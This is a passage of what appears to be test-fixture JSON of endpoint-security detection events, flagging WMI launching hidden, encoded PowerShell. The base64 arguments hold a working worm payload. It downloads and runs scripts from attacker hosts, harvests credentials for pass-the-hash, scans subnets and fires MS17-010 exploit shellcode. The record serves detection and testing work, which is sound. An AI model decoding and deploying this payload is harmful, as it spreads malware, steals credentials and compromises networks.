AGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20190517123456,"sig_rev":5},"detection":"apde:20190517123456","end_ts":1610640884,"engine":"apde","id":"d2616Ab846","name":"WMIPRVSE Launched Encoded Powershell Command","observables":{"file":[{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1},{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1}]},"remediated":false,"severity":"medium","silent":false,"start_ts":1610640884,"tactics":["TA0002","TA0005","TA0008"],"type":"activity","normalized":{"observables":{"file":{"name":["powershell.exe","wmiprvse.exe"],"path":["c:\\windows\\system32\\windowspowershell\\v1.0","c:\\windows\\system32\\wbem"]}},"name":"wmiprvse launched encoded powershell command"},"ts":1610640884},"tactics":["TA0002","TA0005","TA0008"]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":810000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"WMIPRVSE Launched Encoded Powershell Command","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[{"action":"end_process","end_ts":1602033881808,"params":["10724"],"start_ts":1602033881805,"status":"success"}],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUA